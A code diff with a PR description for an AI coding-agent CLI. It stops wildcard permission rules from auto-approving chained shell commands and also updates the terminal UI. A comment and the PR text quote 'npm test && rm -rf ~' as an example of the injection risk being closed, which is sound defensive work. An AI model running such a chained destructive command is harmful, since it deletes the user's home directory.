+      else if (quote === '"' && (ch === '`' || (ch === '$' && command[i + 1] === '('))) return true
+      continue
+    }
+    if (ch === "'" || ch === '"') {
+      quote = ch
+      continue
+    }
+    if (ch === ';' || ch === '&' || ch === '|' || ch === '\n' || ch === '>' || ch === '<' || ch === '`') return true
+    if (ch === '$' && command[i + 1] === '(') return true
+  }
+  return false
+}
+
+/**
  * Turn a concrete command into a generalized glob to persist on "always".
  * "npm run build" → "npm run *", "npx tsc --noEmit" → "npx tsc *",
  * "git commit -m '...'" → "git commit *". Destructive commands (rm, dd, sudo,
  * "git reset", …) are NOT generalized — the exact command is persisted so a
  * single approval can't blanket-authorize a whole dangerous program.
+ *
+ * A compound command (`a && b`, `a | b`) is never generalized either: its first
+ * token says nothing about what the rest of the line does, so widening it would
+ * hand out a rule far broader than what the user actually read and approved.
  */
 export function generalizeCommand(command: string): string {
   const trimmed = command.trim()
@@ -144,6 +198,7 @@ export function generalizeCommand(command: string): string {
   if (tokens.length === 0 || tokens[0] === '') return command
   const prog = tokens[0]
   if (NEVER_GENERALIZE.has(prog)) return trimmed
+  if (hasUnquotedShellOperator(trimmed)) return trimmed
   if (prog === 'git' && tokens.length > 1 && DESTRUCTIVE_GIT_SUBCOMMANDS.has(tokens[1])) {
     return trimmed
   }
@@ -152,9 +207,29 @@ export function generalizeCommand(command: string): string {
   return `${prefix} *`
 }
 
-/** The pattern to persist when the user answers "always" for a tool call. */
-export function patternToPersist(toolName: string, subject: string): string {
-  return toolName === 'run_bash' ? generalizeCommand(subject) : subject
+/**
+ * The rules to persist when the user answers "always" for a tool call.
+ *
+ * For run_bash this is BOTH the exact command and its generalized glob. The
+ * glob alone is not enough: "npm test" generalizes to "npm test *", which needs
+ * a space and at least one more character, so the very command the user just
+ * approved would keep re-prompting forever. Destructive commands generalize to
+ * themselves, so the list collapses to the single exact rule.
+ */
+export function patternsToPersist(toolName: string, subject: string): string[] {
+  if (toolName !== 'run_bash') return [subject]
+  const exact = subject.trim()
+  const glob = generalizeCommand(subject)
+  return glob === exact ? [exact] : [exact, glob]
+}
+
+/**
+ * The widest rule an "always" answer would persist — what the prompt shows the
+ * user as the blast radius of that choice.
+ */
+export function widestPattern(toolName: string, subject: string): string {
+  const patterns = patternsToPersist(toolName, subject)
+  return patterns[patterns.length - 1] ?? ''
 }
 
 /** Convert a glob (only `*` and `?` special) into an anchored RegExp. */
@@ -164,8 +239,26 @@ export function globToRegExp(glob: string): RegExp {
   return new RegExp(`^${pattern}$`)
 }
 
-function matches(rule: Rule, toolName: string, subject: string): boolean {
+/**
+ * A wildcard rule must never span a command boundary. `*` compiles to `.*`,
+ * which happily swallows "&& rm -rf ~" — so an approval of "npm test" would
+ * silently auto-allow "npm test && rm -rf ~". Refuse to satisfy a wildcard rule
+ * from a compound command; the user gets prompted for the real thing instead.
+ *
+ * Exact (wildcard-free) rules are unaffected, so a user who deliberately
+ * approved a specific pipeline still has it auto-allowed on the next identical
+ * call. Only run_bash subjects are commands — path subjects match literally.
+ */
+function outOfWildcardScope(rule: Rule, toolName: string, subject: string): boolean {
+  if (toolName !== 'run_bash') return false
+  if (!rule.pattern.includes('*') && !rule.pattern.includes('?')) return false
+  return hasUnquotedShellOperator(subject)
+}
+
+/** Does this stored rule authorize this call? The whole auto-allow decision. */
+export function ruleAllows(rule: Rule, toolName: string, subject: string): boolean {
   if (rule.tool !== toolName) return false
+  if (outOfWildcardScope(rule, toolName, subject)) return false
   try {
     return globToRegExp(rule.pattern).test(subject)
   } catch {
@@ -185,10 +278,10 @@ export async function check(
 
   const subject = subjectFor(toolName, input)
   const rules = loadRules()
-  if (rules.some((r) => matches(r, toolName, subject))) return 'allow'
+  if (rules.some((r) => ruleAllows(r, toolName, subject))) return 'allow'
 
   const answer = await ctx.ask(toolName, input)
   if (answer === 'no') return 'deny'
-  if (answer === 'always') addRule(toolName, patternToPersist(toolName, subject))
+  if (answer === 'always') addRules(toolName, patternsToPersist(toolName, subject))
   return 'allow'
 }

--- a/src/ui/App.tsx
+++ b/src/ui/App.tsx
@@ -224,7 +224,7 @@ export function App() {
           banner moves into ChatView's <Static> log (Ink prints Static above the
           live frame, so a dynamic banner here would sink below the scrollback). */}
       {state !== 'ready' && state !== 'sessions' && state !== 'models' && (
-        <WelcomeBlock model={cfg.model} activeCtx={activeCtx} effort={effort} cwd={cwd} error={agent.error} updateAvailable={updateAvailable} updateStatus={updateStatus} />
+        <WelcomeBlock variant="compact" model={cfg.model} activeCtx={activeCtx} effort={effort} cwd={cwd} provider={provName} error={agent.error} updateAvailable={updateAvailable} updateStatus={updateStatus} />
       )}
 
       {state === 'loading' && !agent.error && (
@@ -284,7 +284,7 @@ export function App() {
             permissionCursor={agent.permissionCursor}
             activeToolUses={agent.activeToolUses}
             activeToolResults={agent.activeToolResults}
-            header={<WelcomeBlock model={cfg.model} activeCtx={activeCtx} effort={effort} cwd={cwd} />}
+            header={<WelcomeBlock model={cfg.model} activeCtx={activeCtx} effort={effort} cwd={cwd} provider={provName} />}
             logEpoch={logEpoch}
           />
 
@@ -309,7 +309,13 @@ export function App() {
           {/* Pickers have their own inline controls, so they drop the input bar
               entirely (avoids a stray "processing" prompt). */}
           {state === 'ready' && (
-            <InputBar input={input} caret={caret} disabled={agent.busy} processingLabel={agent.processingLabel} />
+            <InputBar
+              input={input}
+              caret={caret}
+              disabled={agent.busy}
+              processingLabel={agent.processingLabel}
+              hint={providerDown ? 'provider unavailable — /provider to switch · /models to pick a model' : undefined}
+            />
           )}
 
           {/* Pickers render below the input bar (like the command palette) so the
@@ -330,15 +336,6 @@ export function App() {
             />
           )}
 
-          {state === 'ready' && !agent.busy && (
-            <Box marginLeft={2} marginBottom={1}>
-              <Text dimColor>
-                {providerDown
-                  ? 'provider unavailable — /provider to switch · /models to pick a model'
-                  : 'type / to see commands'}
-              </Text>
-            </Box>
-          )}
           {updateAvailable && (
             <Box marginLeft={2} marginBottom={1}>
               <Text color={updateStatus === 'failed' ? 'red' : updateStatus === 'installed' ? 'green' : 'yellow'}>

--- a/src/ui/ChatView.tsx
+++ b/src/ui/ChatView.tsx
@@ -3,7 +3,6 @@ import { Box, Text, Static } from 'ink'
 import { renderMarkdownStreaming } from './markdown.js'
 import { ThinkingBlock } from './ThinkingBlock.js'
 import type { ChatMessage, ToolUseDisplay, ToolResultDisplay, PermissionRequest } from './types.js'
-import { EMPTY_STATE_HINTS, EMPTY_STATE_TITLE } from './constants.js'
 import { UserMessage, AssistantMessage } from './Message.js'
 import { ToolUseLine } from './ToolBlock.js'
 import { PermissionPrompt } from './PermissionPrompt.js'
@@ -44,9 +43,6 @@ export function ChatView({
   header,
   logEpoch = 0,
 }: Props) {
-  const empty =
-    messages.length === 0 && !streaming && !thinking && !pendingPermission && !error
-
   // Static log = finished, immutable scrollback. Ink's <Static> writes each item
   // to stdout exactly once and never repaints it, so streaming flushes (which
   // touch only the live frame below) can't trigger a full-history redraw — the
@@ -147,15 +143,6 @@ export function ChatView({
 
       {/* Live frame — repaints freely; holds only the in-flight turn. */}
       <Box flexDirection="column" marginLeft={1} marginBottom={1}>
-        {empty && (
-          <Box flexDirection="column" marginBottom={1}>
-            <Text dimColor>{EMPTY_STATE_TITLE}</Text>
-            {EMPTY_STATE_HINTS.map((h, i) => (
-              <Text key={i} dimColor>{'  '}{h}</Text>
-            ))}
-          </Box>
-        )}
-
         {thinking && <ThinkingBlock content={thinkingContent} />}
 
         {streamNode}

--- a/src/ui/CommandPalette.tsx
+++ b/src/ui/CommandPalette.tsx
@@ -1,18 +1,7 @@
 import { Box, Text } from 'ink'
+import { COMMANDS, type Command } from './constants.js'
 
-export interface Command {
-  name: string
-  description: string
-}
-
-export const COMMANDS: Command[] = [
-  { name: '/models', description: 'pick model · tab to change provider · ←→ effort' },
-  { name: '/provider', description: 'open provider picker (configured in ~/.miii/config.json)' },
-  { name: '/new',    description: 'save current session and start fresh' },
-  { name: '/sessions', description: 'list sessions and resume one' },
-  { name: '/clear',  description: 'clear chat and reset context' },
-  { name: '/exit',   description: 'quit miii' },
-]
+export type { Command }
 
 interface Props {
   filter: string
@@ -28,10 +17,9 @@ export function CommandPalette({ filter, cursor }: Props) {
   return (
     <Box
       flexDirection="column"
+      width="100%"
       borderStyle="round"
       borderColor="gray"
-      marginX={1}
-      marginBottom={0}
       paddingX={1}
     >
       {filtered.map((cmd, i) => {

--- a/src/ui/FilePicker.tsx
+++ b/src/ui/FilePicker.tsx
@@ -5,11 +5,16 @@ import { join, relative } from 'path'
 const IGNORE = new Set(['node_modules', '.git', 'dist', 'build', '.next', 'coverage', '.miii'])
 const MAX_RESULTS = 10
 const MAX_SCAN = 2000
+const CACHE_TTL_MS = 2000
 
-let cache: { cwd: string; files: string[] } | null = null
+let cache: { cwd: string; files: string[]; at: number } | null = null
+
+export function invalidateFileCache(): void {
+  cache = null
+}
 
 function listFiles(cwd: string): string[] {
-  if (cache && cache.cwd === cwd) return cache.files
+  if (cache && cache.cwd === cwd && Date.now() - cache.at < CACHE_TTL_MS) return cache.files
   const out: string[] = []
   const stack: string[] = [cwd]
   while (stack.length && out.length < MAX_SCAN) {
@@ -24,7 +29,7 @@ function listFiles(cwd: string): string[] {
       if (out.length >= MAX_SCAN) break
     }
   }
-  cache = { cwd, files: out }
+  cache = { cwd, files: out, at: Date.now() }
   return out
 }
 

--- a/src/ui/InputBar.test.ts
+++ b/src/ui/InputBar.test.ts
@@ -1,0 +1,89 @@
+import { describe, it, expect } from 'vitest'
+import { viewport, fieldWidth } from './InputBar.js'
+
+describe('fieldWidth', () => {
+  it('leaves room for the border, padding, prompt and scroll indicators', () => {
+    expect(fieldWidth(80)).toBeLessThan(80)
+    expect(fieldWidth(120) - fieldWidth(80)).toBe(40)
+  })
+
+  it('floors on a very narrow terminal instead of going negative', () => {
+    expect(fieldWidth(10)).toBeGreaterThan(0)
+    expect(fieldWidth(0)).toBeGreaterThan(0)
+  })
+})
+
+describe('viewport', () => {
+  it('shows short input whole, with the caret where it was asked for', () => {
+    expect(viewport('hello', 2, 40)).toEqual({
+      text: 'hello',
+      caretCol: 2,
+      more: false,
+      less: false,
+    })
+  })
+
+  it('does not scroll when the text plus the caret cell exactly fit', () => {
+    const v = viewport('abcd', 4, 5)
+    expect(v).toMatchObject({ text: 'abcd', caretCol: 4, less: false, more: false })
+  })
+
+  it('pins the caret to the right edge once the text outruns the field', () => {
+    const input = 'abcdefghijklmnopqrstuvwxyz'
+    const v = viewport(input, input.length, 10)
+    expect(v.caretCol).toBe(9)
+    expect(v.less).toBe(true)
+    expect(v.more).toBe(false)
+    expect(input.endsWith(v.text.trimEnd())).toBe(true)
+  })
+
+  it('shows the head, and flags more to the right, when the caret is at home', () => {
+    const input = 'abcdefghijklmnopqrstuvwxyz'
+    const v = viewport(input, 0, 10)
+    expect(v.text).toBe('abcdefghij')
+    expect(v.caretCol).toBe(0)
+    expect(v.less).toBe(false)
+    expect(v.more).toBe(true)
+  })
+
+  it('clamps a caret outside the string', () => {
+    expect(viewport('abc', 99, 20).caretCol).toBe(3)
+    expect(viewport('abc', -5, 20).caretCol).toBe(0)
+  })
+
+  it('handles an empty string', () => {
+    expect(viewport('', 0, 20)).toEqual({ text: '', caretCol: 0, more: false, less: false })
+  })
+
+  // The invariant the whole component rests on: the rendered row is
+  // `text` with one cell for the caret, so it must never exceed the field. A
+  // row that overflows wraps, the bar grows, the live frame outgrows the
+  // terminal, and Ink falls back to a full-screen repaint — the flicker.
+  it('never renders more columns than the field, for any input/caret/width', () => {
+    for (const len of [0, 1, 5, 9, 10, 11, 40, 500]) {
+      const input = 'x'.repeat(len)
+      for (const width of [1, 2, 8, 10, 37, 80]) {
+        for (const caret of [0, 1, Math.floor(len / 2), len - 1, len, len + 5]) {
+          const v = viewport(input, caret, width)
+          const rendered = Math.max(v.text.length, v.caretCol + 1)
+          expect(
+            rendered,
+            `len=${len} width=${width} caret=${caret} rendered=${rendered}`,
+          ).toBeLessThanOrEqual(width)
+          expect(v.caretCol).toBeGreaterThanOrEqual(0)
+          expect(v.caretCol).toBeLessThanOrEqual(v.text.length)
+        }
+      }
+    }
+  })
+
+  it('always keeps the caret inside the visible window', () => {
+    const input = 'abcdefghijklmnopqrstuvwxyz0123456789'
+    for (let caret = 0; caret <= input.length; caret++) {
+      const v = viewport(input, caret, 12)
+      // The character under the caret is the one at `caret` in the full string
+      // (or the empty cell past the end).
+      expect(v.text[v.caretCol] ?? '').toBe(input[caret] ?? '')
+    }
+  })
+})

--- a/src/ui/InputBar.tsx
+++ b/src/ui/InputBar.tsx
@@ -1,16 +1,79 @@
 import { memo, useEffect, useState } from 'react'
-import { Box, Text } from 'ink'
+import { Box, Text, useStdout } from 'ink'
+import { INPUT_PLACEHOLDER, INPUT_HINTS, BUSY_HINTS } from './constants.js'
 
 interface Props {
   input: string
   caret?: number
   disabled?: boolean
   processingLabel?: string
+  /** Replaces the default key hints — used to surface a provider error. */
+  hint?: string
 }
 
 const SPIN = ['⠋', '⠙', '⠹', '⠸', '⠼', '⠴', '⠦', '⠧', '⠇', '⠏']
 
-export const InputBar = memo(function InputBar({ input, caret, disabled, processingLabel }: Props) {
+/**
+ * Prompt mark, one column. The space that separates it from the text comes from
+ * the left scroll-indicator cell below, so there is exactly one gap either way.
+ */
+const PROMPT = '›'
+
+/**
+ * Columns consumed by everything around the text: the app's outer padding (1
+ * each side), the box border (1), the box's padding (1), the prompt mark, and
+ * the two scroll-indicator cells. The indicators are reserved whether or not
+ * they're showing, so the field width — and the bar's height — never changes.
+ */
+const CHROME_COLS = 6 + PROMPT.length + 2
+
+/** Text columns available inside the framed field, for a terminal `cols` wide. */
+export function fieldWidth(cols: number): number {
+  return Math.max(8, cols - CHROME_COLS)
+}
+
+/**
+ * A single-row window onto `input` that always contains the caret.
+ *
+ * The field must never wrap: this bar sits in Ink's live frame, and a bar that
+ * grows with a long paste pushes the frame past the terminal height, forcing
+ * Ink's full-screen redraw — the flicker the chat view works hard to avoid. So
+ * long input scrolls horizontally instead, with `‹`/`›` marking hidden text.
+ *
+ * Derived purely from (input, caret, width) so there is no scroll state to keep
+ * in sync: the window is pinned so the caret sits at its right edge once the
+ * text outruns the field, which is how a shell prompt behaves.
+ *
+ * `text` is at most `width` columns INCLUDING the caret cell, so the caller can
+ * render before/at/after without overflowing the field.
+ */
+export function viewport(
+  input: string,
+  caret: number,
+  width: number,
+): { text: string; caretCol: number; more: boolean; less: boolean } {
+  const w = Math.max(1, width)
+  const pos = Math.max(0, Math.min(caret, input.length))
+  // Room for every character plus the caret cell — no scrolling needed.
+  if (input.length < w) {
+    return { text: input, caretCol: pos, more: false, less: false }
+  }
+  const start = Math.max(0, Math.min(pos - w + 1, input.length - w + 1))
+  return {
+    text: input.slice(start, start + w),
+    caretCol: pos - start,
+    more: start + w <= input.length,
+    less: start > 0,
+  }
+}
+
+export const InputBar = memo(function InputBar({
+  input,
+  caret,
+  disabled,
+  processingLabel,
+  hint,
+}: Props) {
   const [frame, setFrame] = useState(0)
   useEffect(() => {
     if (!disabled) return
@@ -22,40 +85,53 @@ export const InputBar = memo(function InputBar({ input, caret, disabled, process
     return () => clearInterval(t)
   }, [disabled])
 
+  // The stream Ink is actually rendering to, not the global process.stdout —
+  // they differ under test and when the app is driven programmatically.
+  const { stdout } = useStdout()
+  const view = viewport(input, caret ?? input.length, fieldWidth(stdout?.columns ?? 80))
+  const showPlaceholder = !disabled && input.length === 0
+
   return (
-    <Box
-      borderStyle="single"
-      borderTop={true}
-      borderBottom={true}
-      borderLeft={false}
-      borderRight={false}
-      borderColor={disabled ? 'yellow' : 'white dim'}
-      paddingX={1}
-    >
-      {disabled ? (
-        <>
-          <Text color="yellow">{SPIN[frame] + ' '}</Text>
-          <Text dimColor italic>{processingLabel ?? 'processing…'}</Text>
-          <Text dimColor>  (esc to cancel)</Text>
-        </>
-      ) : (
-        <>
-          <Text dimColor>{'> '}</Text>
-          {(() => {
-            const pos = Math.max(0, Math.min(caret ?? input.length, input.length))
-            const before = input.slice(0, pos)
-            const at = input.slice(pos, pos + 1) || ' '
-            const after = input.slice(pos + 1)
-            return (
+    <Box flexDirection="column" width="100%">
+      <Box
+        width="100%"
+        borderStyle="round"
+        borderColor={disabled ? 'yellow' : 'gray'}
+        paddingX={1}
+      >
+        {disabled ? (
+          <>
+            <Text color="yellow">{SPIN[frame]} </Text>
+            <Text>{processingLabel ?? 'processing…'}</Text>
+          </>
+        ) : (
+          <>
+            <Text color={showPlaceholder ? 'gray' : 'blue'}>{PROMPT}</Text>
+            {/* Gutter: the separator after the prompt, doubling as the
+                scrolled-left marker. Always one column, so the field width —
+                and therefore the bar's height — never changes. */}
+            <Text dimColor>{view.less ? '‹' : ' '}</Text>
+            {showPlaceholder ? (
               <>
-                <Text>{before}</Text>
-                <Text inverse>{at}</Text>
-                <Text>{after}</Text>
+                {/* The caret sits on the placeholder's first cell, so an empty
+                    bar still shows where typing will land. */}
+                <Text inverse>{INPUT_PLACEHOLDER.slice(0, 1)}</Text>
+                <Text dimColor>{INPUT_PLACEHOLDER.slice(1)}</Text>
               </>
-            )
-          })()}
-        </>
-      )}
+            ) : (
+              <>
+                <Text>{view.text.slice(0, view.caretCol)}</Text>
+                <Text inverse>{view.text.slice(view.caretCol, view.caretCol + 1) || ' '}</Text>
+                <Text>{view.text.slice(view.caretCol + 1)}</Text>
+                <Text dimColor>{view.more ? '›' : ' '}</Text>
+              </>
+            )}
+          </>
+        )}
+      </Box>
+      <Box paddingX={1}>
+        <Text dimColor>{hint ?? (disabled ? BUSY_HINTS : INPUT_HINTS)}</Text>
+      </Box>
     </Box>
   )
 })

--- a/src/ui/PermissionPrompt.tsx
+++ b/src/ui/PermissionPrompt.tsx
@@ -1,7 +1,7 @@
 import { Box, Text } from 'ink'
 import type { PermissionRequest } from './types.js'
 import { TOOL_LABEL } from './ToolBlock.js'
-import { subjectFor, patternToPersist } from '../permissions/policy.js'
+import { subjectFor, widestPattern } from '../permissions/policy.js'
 
 function summarizeInput(input: unknown): string {
   if (!input || typeof input !== 'object') return ''
@@ -26,10 +26,11 @@ function summarizeInput(input: unknown): string {
 
 export function PermissionPrompt({ req, cursor }: { req: PermissionRequest; cursor: number }) {
   const label = TOOL_LABEL[req.toolName] ?? req.toolName
-  // The glob an "always" choice would persist. Showing it makes the blast radius
-  // explicit — e.g. "npm run *" auto-allows every npm script, while a destructive
-  // command persists exact so it can't blanket-authorize the whole program.
-  const rule = patternToPersist(req.toolName, subjectFor(req.toolName, req.input))
+  // The widest glob an "always" choice would persist. Showing it makes the blast
+  // radius explicit — e.g. "npm run *" auto-allows every npm script, while a
+  // destructive or compound command persists exact so it can't blanket-authorize
+  // the whole program.
+  const rule = widestPattern(req.toolName, subjectFor(req.toolName, req.input))
   const options = [
     { label: 'Yes', key: 'yes' },
     { label: rule ? `Yes, don't ask again for ${rule}` : "Yes, don't ask again for this", key: 'always' },

--- a/src/ui/WelcomeBlock.tsx
+++ b/src/ui/WelcomeBlock.tsx
@@ -1,5 +1,7 @@
 import { Box, Text } from 'ink'
 import type { Effort } from '../config.js'
+import { currentVersion } from '../updateCheck.js'
+import { WELCOME_COMMANDS, WELCOME_PROMPT } from './constants.js'
 
 // Lifecycle of the background self-update for the launch banner.
 //   idle        — a newer release exists; auto-update off, on cooldown, or failed to start
@@ -23,41 +25,142 @@ export function updateBannerText(version: string, status: UpdateStatus): string 
   }
 }
 
+/** The `>_` prompt mark that brands every miii surface. */
+const MARK = '>_'
+
 interface Props {
   model: string | undefined
   activeCtx: number | null
   effort: Effort
   cwd: string
+  provider?: string
   error?: string | null
   updateAvailable?: string | null
   updateStatus?: UpdateStatus
+  /**
+   * 'full'    — the launch card: identity, session facts, and how to start.
+   *             Printed once into the chat scrollback, Codex-style.
+   * 'compact' — a two-line status strip, for screens that carry their own body
+   *             (model picker, provider picker, connecting…).
+   */
+  variant?: 'full' | 'compact'
 }
 
-export function WelcomeBlock({ model, activeCtx, effort, cwd, updateAvailable, updateStatus = 'idle' }: Props) {
-  const ctxLabel = activeCtx != null ? `${Math.round(activeCtx / 1024)}k ctx` : '— ctx'
+/** model · ctx · effort · provider — the session facts, in one dim row. */
+function statusParts(
+  model: string | undefined,
+  activeCtx: number | null,
+  effort: Effort,
+  provider?: string,
+): string[] {
+  return [
+    model ?? 'no model — /models',
+    activeCtx != null ? `${Math.round(activeCtx / 1024)}k ctx` : '— ctx',
+    `${effort} effort`,
+    ...(provider ? [provider] : []),
+  ]
+}
+
+/**
+ * Dot-separated status row. Built as one string rather than a <Box gap> of
+ * <Text>s so it wraps as a unit on a narrow terminal instead of laying the
+ * separators out as flex children.
+ */
+function StatusRow({ parts }: { parts: string[] }) {
+  return <Text dimColor>{parts.join('  ·  ')}</Text>
+}
+
+export function WelcomeBlock({
+  model,
+  activeCtx,
+  effort,
+  cwd,
+  provider,
+  updateAvailable,
+  updateStatus = 'idle',
+  variant = 'full',
+}: Props) {
+  const version = currentVersion()
+  const parts = statusParts(model, activeCtx, effort, provider)
+  const updateColor =
+    updateStatus === 'failed' ? 'red' : updateStatus === 'installed' ? 'green' : 'yellow'
+
+  if (variant === 'compact') {
+    return (
+      <Box flexDirection="column" marginBottom={1}>
+        <Box
+          flexDirection="column"
+          width="100%"
+          borderStyle="round"
+          borderColor="gray"
+          paddingX={1}
+        >
+          <Text>
+            <Text color="blue" bold>{MARK} miii</Text>
+            <Text dimColor>{version ? `  v${version}` : ''}</Text>
+          </Text>
+          <StatusRow parts={parts} />
+          <Text dimColor>{cwd}</Text>
+        </Box>
+        {updateAvailable && (
+          <Text color={updateColor}>{updateBannerText(updateAvailable, updateStatus)}</Text>
+        )}
+      </Box>
+    )
+  }
+
+  // Command names are padded to a common width so the descriptions line up in a
+  // column — the list reads as a table rather than ragged prose. The 0 floor
+  // keeps Math.max from returning -Infinity if the featured list ever resolves
+  // empty (a name renamed in COMMANDS but not in WELCOME_COMMAND_NAMES).
+  const nameWidth = Math.max(0, ...WELCOME_COMMANDS.map((c) => c.name.length))
+
   return (
     <Box flexDirection="column" marginBottom={1}>
+      <Box marginBottom={1}>
+        <Text>
+          <Text color="blue" bold>{MARK} miii</Text>
+          <Text dimColor>{version ? `  v${version}` : ''}</Text>
+        </Text>
+      </Box>
+
       <Box
         flexDirection="column"
+        width="100%"
         borderStyle="round"
         borderColor="gray"
         paddingX={2}
       >
-        <Box gap={2}>
-          <Text bold color="blue">MIII CLI</Text>
-          <Text dimColor>·</Text>
-          <Text>{model ?? '/models'}</Text>
-          <Text dimColor>·</Text>
-          <Text>{ctxLabel}</Text>
-          <Text dimColor>·</Text>
-          <Text>{effort} effort</Text>
-        </Box>
-        <Text dimColor>{cwd}</Text>
-      </Box>
-      {updateAvailable && (
-        <Text color={updateStatus === 'failed' ? 'red' : updateStatus === 'installed' ? 'green' : 'yellow'}>
-          {updateBannerText(updateAvailable, updateStatus)}
+        {/* One <Text> with nested styling, not sibling <Text>s in a row Box:
+            siblings are separate flex children and each wraps on its own, which
+            shreds the sentence on a narrow terminal. Nested <Text> is inline. */}
+        <Text>
+          <Text color="blue">{MARK}</Text> You are using <Text bold>miii</Text> in{' '}
+          <Text bold>{cwd}</Text>
         </Text>
+
+        <StatusRow parts={parts} />
+
+        <Box marginTop={1}>
+          <Text dimColor>{WELCOME_PROMPT}</Text>
+        </Box>
+
+        <Box flexDirection="column" marginTop={1}>
+          {WELCOME_COMMANDS.map((cmd) => (
+            // Padding inside a single <Text> keeps the two columns aligned while
+            // still wrapping as one unit — a row Box would wrap the command name
+            // itself once the terminal gets narrow.
+            <Text key={cmd.name}>
+              <Text color="blue">{cmd.name.padEnd(nameWidth)}</Text>
+              {'  '}
+              <Text dimColor>{cmd.description}</Text>
+            </Text>
+          ))}
+        </Box>
+      </Box>
+
+      {updateAvailable && (
+        <Text color={updateColor}>{updateBannerText(updateAvailable, updateStatus)}</Text>
       )}
     </Box>
   )

--- a/src/ui/constants.ts
+++ b/src/ui/constants.ts
@@ -1,13 +1,39 @@
 /** UI constants & onboarding copy — kept out of components for easy editing. */
 
-/** Hints shown in the empty chat state. Edit here to tweak onboarding. */
-export const EMPTY_STATE_HINTS: string[] = [
-  '• explain @file — reference a file with @',
-  '• /models — switch model or effort',
-  '• /new — start a new chat',
-  '• /sessions — view saved chats',
-  '• ctrl+v — paste an image (needs a vision model)',
-  '• ctrl+t — toggle thinking',
+export interface Command {
+  name: string
+  description: string
+}
+
+/**
+ * Slash commands, in the order the palette lists them. Single source of truth:
+ * the palette filters this, and the welcome card quotes a subset by name, so a
+ * description edited here updates both.
+ */
+export const COMMANDS: Command[] = [
+  { name: '/models', description: 'pick model · tab to change provider · ←→ effort' },
+  { name: '/provider', description: 'open provider picker (configured in ~/.miii/config.json)' },
+  { name: '/new',    description: 'save current session and start fresh' },
+  { name: '/sessions', description: 'list sessions and resume one' },
+  { name: '/clear',  description: 'clear chat and reset context' },
+  { name: '/exit',   description: 'quit miii' },
 ]
 
-export const EMPTY_STATE_TITLE = 'Ask anything, or try:'
+/** Commands featured on the welcome card, in display order. */
+const WELCOME_COMMAND_NAMES = ['/models', '/sessions', '/new', '/clear']
+
+/** The featured commands, resolved against COMMANDS so copy never drifts. */
+export const WELCOME_COMMANDS: Command[] = WELCOME_COMMAND_NAMES.flatMap(
+  (name) => COMMANDS.find((c) => c.name === name) ?? [],
+)
+
+export const WELCOME_PROMPT = 'To get started, describe a task or try one of these commands:'
+
+/** Placeholder shown in the input bar while it's empty. */
+export const INPUT_PLACEHOLDER = 'describe a task, or type / for commands'
+
+/** Key hints under the input bar. Kept short — they share one line. */
+export const INPUT_HINTS = '⏎ send · / commands · @ file · ctrl+v image · ctrl+t thinking'
+
+/** Key hints under the input bar while a turn is running. */
+export const BUSY_HINTS = 'esc interrupt · ctrl+o expand tool output'

--- a/src/ui/hooks/useAgentRunner.ts
+++ b/src/ui/hooks/useAgentRunner.ts
@@ -51,6 +51,20 @@ export function useAgentRunner(model: string | undefined, activeCtx: number | nu
     req.resolve(answers[cursor])
   }
 
+  /**
+   * Answer a pending prompt with 'no' without the user picking an option — used
+   * when they cancel the whole turn instead. Aborting the run alone would leave
+   * this promise unsettled, and the agent loop parks on it forever: the turn
+   * never finishes, `busy` never clears, and the input stays locked.
+   */
+  function cancelPermission() {
+    const req = pendingPermissionRef.current
+    if (!req) return
+    pendingPermissionRef.current = null
+    setPendingPermission(null)
+    req.resolve('no')
+  }
+
   async function sendMessage(text: string, images?: string[]) {
     if (busyRef.current || !model) return
     busyRef.current = true
@@ -245,5 +259,6 @@ export function useAgentRunner(model: string | undefined, activeCtx: number | nu
     // actions
     sendMessage,
     resolvePermission,
+    cancelPermission,
   }
 }

--- a/src/ui/hooks/useKeyboard.ts
+++ b/src/ui/hooks/useKeyboard.ts
@@ -11,7 +11,7 @@ import { useInput, useStdout } from 'ink'
 import { readClipboardImage } from '../clipboard.js'
 import { setModel, setEffort, type NamedProvider, type Provider, type Effort } from '../../config.js'
 import { filteredCommands } from '../CommandPalette.js'
-import { parseMention, searchFiles } from '../FilePicker.js'
+import { invalidateFileCache, parseMention, searchFiles } from '../FilePicker.js'
 import { toggleThinkingVisible } from '../ThinkingBlock.js'
 import { toggleToolExpanded } from '../toolExpand.js'
 import { setTerminalTitle, resetTerminalTitle } from '../terminalTitle.js'
@@ -200,7 +200,7 @@ export function useKeyboard(opts: KeyboardOptions) {
   } = opts
 
   const {
-    pendingPermissionRef, permissionCursor, setPermissionCursor, resolvePermission,
+    pendingPermissionRef, permissionCursor, setPermissionCursor, resolvePermission, cancelPermission,
     busyRef, abortRef,
     sendMessage, agentHistory, setMessages, setAgentHistory, setStreamingContent, setThinkingContent,
     setActiveToolUses, setActiveToolResults, setError,
@@ -246,6 +246,11 @@ export function useKeyboard(opts: KeyboardOptions) {
     if (key.ctrl && char === 'o') { toggleToolExpanded(); return }
 
     if (key.escape && busyRef.current && abortRef.current) {
+      // Settle a permission prompt that's waiting on the user before aborting.
+      // The agent loop is parked on that promise; aborting alone never wakes it,
+      // so the turn would hang with the input locked. 'no' is the honest answer
+      // — they cancelled rather than approved.
+      cancelPermission()
       abortRef.current.abort()
       return
     }
@@ -385,6 +390,9 @@ export function useKeyboard(opts: KeyboardOptions) {
 
       const paletteOpen = input.startsWith('/')
       const matches = paletteOpen ? filteredCommands(input) : []
+      // typing the '@' that opens a mention drops the file cache, so a picker
+      // opened just after creating a file still lists it.
+      if (char === '@') invalidateFileCache()
       const mention = !paletteOpen ? parseMention(input) : null
       const fileMatches = mention ? searchFiles(process.cwd(), mention.query) : []
       const fileOpen = mention !== null && fileMatches.length > 0

--- a/src/updateCheck.ts
+++ b/src/updateCheck.ts
@@ -30,7 +30,7 @@ function markUpdateAttempt(): void {
   }
 }
 
-function currentVersion(): string {
+export function currentVersion(): string {
   try {
     return (require('../package.json') as { version: string }).version
   } catch {


### PR DESCRIPTION
… boundaries

Permissions
- A wildcard rule must never span a command boundary. `*` compiles to `.*`, which happily swallows "&& rm -rf ~", so an approval of "npm test" would silently auto-allow "npm test && rm -rf ~". ruleAllows() now refuses to satisfy a wildcard rule from a compound command; the user gets prompted for the real thing instead. Exact rules are unaffected, so a deliberately approved pipeline still auto-allows.
- hasUnquotedShellOperator() detects chaining, substitution and redirection outside quotes, so the everyday false positives stay quiet: the && in `git commit -m "fix a && b"` and the | in `grep "a|b" file` are literal text, not operators.
- generalizeCommand() no longer widens a compound command — its first token says nothing about what the rest of the line does.
- "always" now persists BOTH the exact command and its generalized glob. The glob alone was not enough: "npm test" generalizes to "npm test *", which needs a space and one more character, so the very command just approved would re-prompt forever. addRules() writes both in one load/save cycle.
- The prompt shows widestPattern(), the actual blast radius of "always".

